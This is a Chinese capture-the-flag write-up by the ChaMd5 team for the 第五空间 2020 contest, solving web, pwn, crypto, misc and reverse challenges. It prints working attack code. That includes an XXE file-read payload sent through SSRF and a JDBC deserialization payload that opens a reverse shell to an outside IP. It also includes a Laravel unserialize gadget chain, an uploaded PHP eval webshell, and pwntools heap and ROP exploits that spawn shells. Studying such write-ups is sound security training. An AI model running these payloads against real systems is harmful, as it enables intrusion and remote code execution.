第五空间-WriteUp

CTF ChaMd5安全团队
2020-08-11 11,537

WEB

do you know

解题思路

SSRF 利用 gopher 模拟 POST 请求,访问 xxe.php,然后利用 xxe 来读文件

index.php 里禁用了 

preg_match("/log|flag|hist|dict|etc|file|write/i" ,$poc))

而在 xxe.php 里用的是 replace

preg_replace("/file|flag|write|xxe|test|rot13|utf|print|quoted|read|string|ASCII|ISO|CP1256|cs_CZ|en_AU|dtd|mcrypt|zlib/i",'',$data)

那么可以直接用 双写的方式来 bypass, 类似这样:

flreadag   ==> preg_replace("/flag/i", '', $data) ==> flag

找个 XXE 读文件的 exp, 直接 xxe 读 flag.php 完事:

<?xml version="1.0" encoding="ureadtf-8"?>
<!DOCTYPE xe [
<!ELEMENT name ANY >
<!ENTITY xe SYSTEM "php://filter/rereadad=convert.base64-encode/resource=flreadag.php" >]>
<root>
<name>&xe;</name>
</root>

注意先在本地搭个 php 直接 POST, 获取  Content-Length

然后 用 gopher 发过去, 注意 xxe 的 payload 要用 3 次 URL 编码:


PD9waHAKJGZsYWc9J2ZsYWd7NWJjMGJjMjkxZDMyMjQ1MDY3OTg2NmQ1ZGRmMGEzNDZ9JzsK

<?php
$flag='flag{5bc0bc291d322450679866d5ddf0a346}';


hate-php

解题思路

SUCTF 原题, 直接对 _GET 取反即可

➜  ctf php -r "var_dump(urlencode(~'_GET'));"
string(12) "%A0%B8%BA%AB"

              


zzm's blog

解题思路

根据pom文件提供的jackson和mysql搜索了下漏洞,发现几篇文章

https://xz.aliyun.com/t/7067

https://www.anquanke.com/post/id/203086

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12086

https://github.com/codeplutos/CVE-2019-12086-jackson-databind-file-read

https://github.com/fnmsd/MySQL_Fake_Server

主要值得是jdbcurl可以指定导致rce

所以先搭建一个假的mysql_server,注意如果端口冲突可以选择在py里改其它端口。

下载https://github.com/fnmsd/MySQL_Fake_Server里的源码,然后运行python3 server.py      


因为要利用反序列化要用到ysoserial,没有的可以从github下载编译,然后把编译好的jar包放在server.py的当前目录下

              

然后提交ServerStatusDiffInterceptor类型的payload

%7B%22id%22%3A%5B%22com.mysql.cj.jdbc.admin.MiniAdmin%22%2C+%22jdbc%3Amysql%3A%2F%2F47.103.119.201%3A3306%2Ftest%3FautoDeserialize%3Dtrue%26queryInterceptors%3Dcom.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor%26user%3Dyso_CommonsCollections10_bash+-c+%7Becho%2CL2Jpbi9iYXNoIC1pID4mICAgL2Rldi90Y3AvNDcuMTAzLjExOS4yMDEvODg4OSAwPiYx%7D%7C%7Bbase64%2C-d%7D%7C%7Bbash%2C-i%7D%22%5D%7D

在服务器监听8889端口即可收到shell               

cat flag_keowpijkoqeew


laravel

解题思路

laravel版本

./artisan --version

Laravel Framework 5.7.28

审计源码,一个裸的反序列化,5.7.2x存在已知的利用链,只是this->run()被删掉了,所以想办法找到了一个call_user_func来执行PendingCommand对象的run()方法,exp如下:

<?php//gadgets.phpnamespace Illuminate\Foundation\Testing{    class PendingCommand{        protected $command;        protected $parameters;        protected $app;        public $test;

        public function __construct($command, $parameters,$class,$app){            $this->command = $command;            $this->parameters = $parameters;            $this->test=$class;            $this->app=$app;        }    }}

namespace Illuminate\Auth{    class GenericUser{        protected $attributes;        public function __construct(array $attributes){            $this->attributes = $attributes;        }    }}



namespace Illuminate\Foundation{    class Application{        protected $hasBeenBootstrapped = false;        protected $bindings;

        public function __construct($bind){            $this->bindings=$bind;        }    }}

namespace Symfony\Component\Routing\Loader\Configurator{    class CollectionConfigurator    {        public $parent;        public $collection;        public $prefixes;

        public function __construct($parent){            $this->prefixes=1;            $this->parent=$parent;            $this->collection=new \Symfony\Component\Routing\RouteCollection(array("12end"=>"12end"));        }    }}

namespace Faker{    class ValidGenerator    {        protected $generator;        protected $validator;        protected $maxRetries;

        public function __construct($validator){            $this->generator = new \Symfony\Component\Routing\RouteCollection(array("12end"=>"12end"));            $this->validator = $validator;            $this->maxRetries = 10;        }    }}

namespace Symfony\Component\Routing{    class RouteCollection{

    }}?>
<?php//chain.phpinclude("gadgets.php");

$payload=new Illuminate\Foundation\Testing\PendingCommand(        "system",array('cat /flag'),        new Illuminate\Auth\GenericUser(array("expectedOutput"=>array("0"=>"1"),"expectedQuestions"=>array("0"=>"1"))),        new Illuminate\Foundation\Application(array("Illuminate\Contracts\Console\Kernel"=>array("concrete"=>"Illuminate\Foundation\Application")))    );

$a = new Faker\ValidGenerator(array($payload,"run"));echo urlencode(serialize(new Symfony\Component\Routing\Loader\Configurator\CollectionConfigurator($a)));?>
访问:http://139.9.134.37/index?p=O%3A68%3A%22Symfony%5CComponent%5CRouting%5CLoader%5CConfigurator%5CCollectionConfigurator%22%3A3%3A%7Bs%3A6%3A%22parent%22%3BO%3A20%3A%22Faker%5CValidGenerator%22%3A3%3A%7Bs%3A12%3A%22%00%2A%00generator%22%3BO%3A41%3A%22Symfony%5CComponent%5CRouting%5CRouteCollection%22%3A0%3A%7B%7Ds%3A12%3A%22%00%2A%00validator%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A44%3A%22Illuminate%5CFoundation%5CTesting%5CPendingCommand%22%3A4%3A%7Bs%3A10%3A%22%00%2A%00command%22%3Bs%3A6%3A%22system%22%3Bs%3A13%3A%22%00%2A%00parameters%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A9%3A%22cat+%2Fflag%22%3B%7Ds%3A6%3A%22%00%2A%00app%22%3BO%3A33%3A%22Illuminate%5CFoundation%5CApplication%22%3A2%3A%7Bs%3A22%3A%22%00%2A%00hasBeenBootstrapped%22%3Bb%3A0%3Bs%3A11%3A%22%00%2A%00bindings%22%3Ba%3A1%3A%7Bs%3A35%3A%22Illuminate%5CContracts%5CConsole%5CKernel%22%3Ba%3A1%3A%7Bs%3A8%3A%22concrete%22%3Bs%3A33%3A%22Illuminate%5CFoundation%5CApplication%22%3B%7D%7D%7Ds%3A4%3A%22test%22%3BO%3A27%3A%22Illuminate%5CAuth%5CGenericUser%22%3A1%3A%7Bs%3A13%3A%22%00%2A%00attributes%22%3Ba%3A2%3A%7Bs%3A14%3A%22expectedOutput%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3B%7Ds%3A17%3A%22expectedQuestions%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3B%7D%7D%7D%7Di%3A1%3Bs%3A3%3A%22run%22%3B%7Ds%3A13%3A%22%00%2A%00maxRetries%22%3Bi%3A10%3B%7Ds%3A10%3A%22collection%22%3BO%3A41%3A%22Symfony%5CComponent%5CRouting%5CRouteCollection%22%3A0%3A%7B%7Ds%3A8%3A%22prefixes%22%3Bi%3A1%3B%7D

美团外卖

解题思路

扫目录得到 www.zip

daochu.php 存在注入

admin,content,hint,mac,sms

select hints from hint

see_the_dir_956c110ef9decdd920249f5fed9e4427

http://119.3.183.154/956c110ef9decdd920249f5fed9e4427

www/lib/webuploader/0.1.5/server/preview.php 似乎有问题

curl http://119.3.183.154/956c110ef9decdd920249f5fed9e4427/lib/webuploader/0.1.5/server/preview.php -d 'data:image/txt;base64,PD9waHAgZXZhbCgkX1BPU1RbMV0pOw=='

!!!! Congratulations on infiltrating here, but it's a pity that someone has infiltrated and left a Trojan, do not continue here , please see the e98a4571cf72b798077d12d6c94629.php !!!!!

 

http://119.3.183.154/956c110ef9decdd920249f5fed9e4427/lib/webuploader/0.1.5/server/e98a4571cf72b798077d12d6c94629.php?file=/flag

Misc




loop

解题思路

7z加鼠标连点宏


麒麟系统

解题思路     



run 

解题思路

附件为一个run.exe,运行之后打开一个没啥内容的docx。分析发现run.exe其实是一个自解压程序      

随后分析里面的run.exe,里面的run.exe运行之后产生一个tif文件,查看文件头得知为tiff格式

在文件末尾发现一串数据

njCp1HJBPLVTxcMhUHDPwE7mPW

把tif文件拖到PS里,可以看到两个图层,黑色矩形的盖住了什么,移开之后得到一段代码

       

a = 'njCp1HJBPLVTxcMhUHDPwE7mPW'flag = ""for i in range(len(a)):    if i % 2 == 0:        flag += chr(ord(a[i]) - 1)    else:        flag += chr(ord(a[i]) + 1)print flag
#mkBq0IICOMUUwdLiTICQvF6nOX

Crypto



rosb

解题思路

RSA共模攻击

#! /usr/bin/env python2# -*- coding: utf-8 -*-

from libnum import n2s, s2nfrom gmpy2 import invert

# 扩展欧几里得算法def egcd(a, b):  if a == 0:    return (b, 0, 1)  else:    g, y, x = egcd(b % a, a)    return (g, x - (b // a) * y, y)



def main():  n = 0xa1d4d377001f1b8d5b2740514ce699b49dc8a02f12df9a960e80e2a6ee13b7a97d9f508721e3dd7a6842c24ab25ab87d1132358de7c6c4cee3fb3ec9b7fd873626bd0251d16912de1f0f1a2bba52b082339113ad1a262121db31db9ee1bf9f26023182acce8f84612bfeb075803cf610f27b7b16147f7d29cc3fd463df7ea31ca860d59aae5506479c76206603de54044e7b778e21082c4c4da795d39dc2b9c0589e577a773133c89fa8e3a4bd047b8e7d6da0d9a0d8a3c1a3607ce983deb350e1c649725cccb0e9d756fc3107dd4352aa18c45a65bab7772a4c5aef7020a1e67e6085cc125d9fc042d96489a08d885f448ece8f7f254067dfff0c4e72a63557L  c1 = 0x2f6546062ff19fe6a3155d76ef90410a3cbc07fef5dff8d3d5964174dfcaf9daa003967a29c516657044e87c1cbbf2dba2e158452ca8b7adba5e635915d2925ac4f76312feb3b0c85c3b8722c0e4aedeaec2f2037cc5f676f99b7260c3f83ffbaba86cda0f6a9cd4c70b37296e8f36c3ceaae15b5bf0b290119592ff03427b80055f08c394e5aa6c45bd634c80c59a9f70a92dc70eebec15d4a5e256bf78775e0d3d14f3a0103d9ad8ea6257a0384091f14da59e52581ba2e8ad3adb9747435e9283e8064de21ac41ab2c7b161a3c072b7841d4a594a8b348a923d4cc39f02e05ce95a69c7500c29f6bb415c11e4e0cdb410d0ec2644d6243db38e893c8a3707L  c2 = 0xd32dfad68d790022758d155f2d8bf46bb762ae5cc17281f2f3a8794575ec684819690b22106c1cdaea06abaf7d0dbf841ebd152be51528338d1da8a78f666e0da85367ee8c1e6addbf590fc15f1b2182972dcbe4bbe8ad359b7d15febd5597f5a87fa4c6c51ac4021af60aeb726a3dc7689daed70144db57d1913a4dc29a2b2ec34c99c507d0856d6bf5d5d01ee514d47c7477a7fb8a6747337e7caf2d6537183c20e14c7b79380d9f7bcd7cda9e3bfb00c2b57822663c9a5a24927bceec316c8ffc59ab3bfc19f364033da038a4fb3ecef3b4cb299f4b600f76b8a518b25b576f745412fe53d229e77e68380397eee6ffbc36f6cc734815cd4065dc73dcbcbL  e1 = 0xf4c1158fL  e2 = 0xf493f7d1L  s = egcd(e1, e2)  s1 = s[1]  s2 = s[2]  # 求模反元素  if s1 < 0:    s1 = - s1    c1 = invert(c1, n)  elif s2 < 0:    s2 = - s2    c2 = invert(c2, n)

  m = pow(c1, s1, n) * pow(c2, s2, n) % n  print(n2s(m))  # 二进制转string



if __name__ == '__main__':  main()

Pwn




of

解题思路

看到源码存在UAF

远程测试发现和源码不同,没有了cookie操作,不知道是怎么部署的

直接改free_hook调用system即可

from pwn import *
context.log_level="debug"def add(index):   p.sendlineafter(": ","1")   p.sendlineafter(": ",str(index))   
def edit(index,note):   p.sendlineafter(": ","2")   p.sendlineafter("Index: ",str(index))    p.sendafter("Content: ",note)
def show(index):   p.sendlineafter(": ","3")   p.sendlineafter("Index: ",str(index))  
def delete(index):   p.sendlineafter(": ","4")   p.sendlineafter(": ",str(index))  p=remote("121.36.74.70",9999)#p=process("./a.out")for i in range(9):   add(i)for i in range(8):   delete(i)show(7)p.recvuntil(": ")libc=u64(p.recv(6)+"\x00\x00")-0x7ffff7dcfca0+0x7ffff79e4000print hex(libc)edit(6,p64(libc+0x003ed8e8))edit(0,"/bin/sh\x00")add(10)add(11)edit(11,p64(libc+0x04f440))delete(0)p.interactive()


pwnme

解题思路

堆溢出,可以溢出任意字节

uclibc-ng 1.0.34

看到free的fastbin操作:


不是加减,是异或了一下:

对应到默认堆管理模式下free时用到的一个宏:    

   






(而且不check chunk header,保证对其就行,exp写的蠢了,直接任意地址分配就完了

from pwn import *import syscontext.log_level="debug"
def show():     p.sendlineafter(">>> ","1")def add(l,note):     p.sendlineafter(">>> ","2")     p.sendlineafter(":",str(l))     p.sendafter(":",note)def change(index,l,note):     p.sendlineafter(">>> ","3")     p.sendlineafter(":",str(index))     p.sendlineafter(":",str(l))     p.sendafter(":",note)def remove(index):     p.sendlineafter(">>> ","4")     p.sendlineafter(":",str(index))if len(sys.argv)==1:    #p=process(["qemu-arm","-g","1234","-L","./","./a.out"])     p=remote("121.36.58.215",1337)else:    p=process(["qemu-arm","-L","./","./a.out"])add(0x18,"aaaaaaaa")add(0x4f8,"aaaaaaaa")add(0x18,"aaaaaaaa")add(0x18,"aaaaaaaa")change(0,0x40,"a"*0x1c+p64(0x500+0x20+1))remove(1)add(0x4f8,"aaaaaaaa")show()p.recvuntil("2 : ")libc=u32(p.recv(4))+0xff720000-0xff7ba8ecprint hex(libc)add(0x18,"aaaaaaa")add(0x21,"aaaaaaa")remove(0)remove(4)change(2,8,p32(0x21048^0x22))add(0x18,"aaaaa")add(0x18,"aaaaa")change(4,0xf8,"/bin/sh\x00"+p32(0)*4+p32(0x28)+p32(0x21038))change(0,0x8,p32(libc+0x51800))#show()remove(4)p.interactive()


twice

解题思路

栈溢出题目,第一次输入通过覆盖canary低字节泄露canary和rbp,第二次输入做栈迁移泄露出libc基址,随后覆盖返回地址为one_gadget,getshell

from pwn import *file = './pwn'p = process(file)elf = ELF(file)libc = ELF("../libc-2.23.so")p = remote("121.36.59.116", 9999)def exp():  payload1 = 'a'*0x59  p.sendafter(">", payload1)
  p.recvuntil("a"*0x59)  canary = u64('\x00'+p.recv(7))  stack = u64(p.recv(6)+'\x00'*2)  print hex(canary)  print hex(stack)
  payload2 = p64(0x400923)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(0x4007a9)  payload2 = payload2.ljust(0x58, 'a')  payload2 += p64(canary)+p64(stack-0x78)+p64(0x400879)
  p.sendafter(">", payload2)  puts = u64(p.recvuntil('\x7f')[-6:]+'\x00'*2)  print hex(puts)  libc_base = puts - libc.sym['puts']  payload3 = 'b'*0x58+p64(canary)+p64(0)+p64(libc_base+0x45216)  p.sendafter(">", payload3)  p.interactive()if __name__ == '__main__':  exp()

Reverse




nop

解题思路

通过int 0x80中断来调用函数,进行反调试,有4处,直接nop相应函数即可。输出的整数存储在0x804a038地址。

                                                                 

有三处inc和一处加0xcccccccc进行运算。后续连续调用两次sub_8048691,会对eax中存储的值赋值为0x90,也就是nop指令。

         

而在后续的指令中发现一处多余的跳转,这个指令的长度也正好为两个字节,所以把这处指令nop,即可到达right。由于寄存器的位数固定,所以会造成一个溢出。input+3+0xcccccccc=0x8048765。反推出input,就是flag。


ManageCode 

解题思路

先是直接用dnspy打开,在动调的过程中能看见一个check函数

         


绕过该检测之后,发现还有两个check是无法直接查看的,通过ida打开程序,根据偏移量修复函数

       


最主要的检测函数为   

           

直接用脚本计算出每一个数字并拼接起来,并按照相应的格式调整即可得到

v2=-4419096//-401736
v31=(473999 * v2-23642821)//-191967
v3=(57125 * v2+465507 * v31-42831307)//207145
v5=(-488633 * v2 - 5245 * v31 - 280749 * v3+560637)//-149773
v6=(381790 * v3+ 130415 * v31 + 174205 * v5 - 83562 * v2-27764403)//-59135
v7=(386908 * v2 + 465831 * v5+500139 * v6+474240 * v3 - 4838 * v31-119143813)//-500998
v10=(182991 * v5 + -200009 * v31 - 497601 * v2+ 269682 * v6 + -269523 * v7 - 441164 * v3+52489521)//153099
v11=(- 162386 * v2 + 522547 * v5 + 260922 * v7 + 428523 * v3 + 508037 * v6 - 144626 * v31 - 99507 * v10-67497415)//14894
v12=(51126 * v3+ 145838 * v11+ 362957 * v6+ 43500 * v31+ 308294 * v2-375461 * v5- 394061 * v10- 65395 * v7+43306962)//174341
v13=(350654 * v2+ 495127 * v6+ 434878 * v11- 75418 * v10- 43467 * v31-521005 * v7- 226910 * v12- 121973 * v5- 446107 * v3+137046349)//215985
v14=(-318934 * v31- 25936 * v2- 341583 * v12+ 320416 * v3+ 339525 * v11- 81574 * v6- 502348 * v10- 363326 * v5- 391486 * v7- 248464 * v13+244744603)//294177
v15=(81654 * v11+ 432919 * v10+ 110106 * v12- 507164 * v3- 467060 * v7- 197253 * v13- 354555 * v31- 16893 * v14- 254110 * v2- 479559 * v5- 50999 * v6+214023755)//384845
v16=(-117388 * v13- 227694 * v2+ 457647 * v6+ 293306 * v11+ 101385 * v5+ 293124 * v14+ 496679 * v12+ 79854 * v3-81913 * v31- 507308 * v7- 3285 * v15- 71736 * v10 -50059304)//(-92941)
v17=(281406 * v3+ 314118 * v6-480916 * v11- 442447 * v14- 25649 * v2+ 389372 * v16+ 15089 * v5+ 210603 * v10+ 5 * (v12 + 17363 * v7 - 91574 * v15)- 469378 * v13- 117744 * v31+176657564)//124091
v18=(180059 * v10+ 350603 * v2-439557 * v15- 485708 * v3+ 52520 * v13+ 303697 * v6+ 395976 * v14+ 406658 * v7-354103 * v17- 61339 * v16- 495692 * v31- 198340 * v5- 28153 * v12- 113385 * v11+48802225)//492085
v19=(473763 * v12+ 249640 * v10+ 450341 * v5+ 273347 * v17+ 386739 * v31+ 24246 * v7+ 20430 * v15+ 69055 * v6+ 391476 * v14+ 100872 * v11+ 458039 * v16+ 71004 * v13-277369 * v3- 468152 * v2- 409044 * v18-224749784)//482854
print(hex(v2),hex(v31),hex(v3),hex(v5),hex(v6),hex(v7),hex(v10),hex(v11),hex(v12),hex(v13),hex(v14),hex(v15),hex(v16),hex(v17),hex(v18),hex(v19))
print(len('0b600c-3a198c-0e0891-9aa2ac765e0c7e'))

rev

解题思路

过程不复杂,但是不会反算啊,只能爆了。

image.png

本文作者:ChaMd5安全团队

本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/137409.html

Tags:
点赞: 4 评论:0 收藏: 0
 积分 20
新浪微博 QQ空间 微信扫一扫
评论  (0)
快来写下你的想法吧!

ChaMd5安全团队
文章数:85 积分: 181

www.chamd5.org 专注解密MD5、Mysql5、SHA1等

安全问答社区

安全问答社区

脉搏官方公众号

脉搏公众号

活动日程

2022-06-17

Gdevops 全球敏捷运维峰会

2022-05-12

Mastering the Challenge!——来自The 3rd AutoCS 2022智能汽车信息安全大会的邀请函

2021-11-18

AutoSW 2021智能汽车软件开发大会

2021-06-27

2021中国国际网络安全博览会暨高峰论坛

2021-05-27

The 2nd AutoCS 2021智能汽车信息安全大会

2020-12-18

贝壳找房2020 ICS安全技术峰会

2020-12-11

全球敏捷运维峰会(Gdevops2020)

2020-12-04

2020京麒网络安全大会

2020-11-29

OPPO技术开放日第六期|聚焦应用与数据安全防护

2020-11-27

EISS-2020企业信息安全峰会之上海站 11.27

2020-09-24

CSDI summit中国软件研发管理行业技术峰会

2020-09-23

2020中国国际智慧能源暨能源数据中心与网络信息安全装备展览会

2020-07-31

EISS-2020企业信息安全峰会之北京站 | 7.31(周五线上)

2020-04-15

看雪.安恒 2020 KCTF 春季赛

2020-01-09

相约本地生活安全沙龙暨白帽子颁奖典礼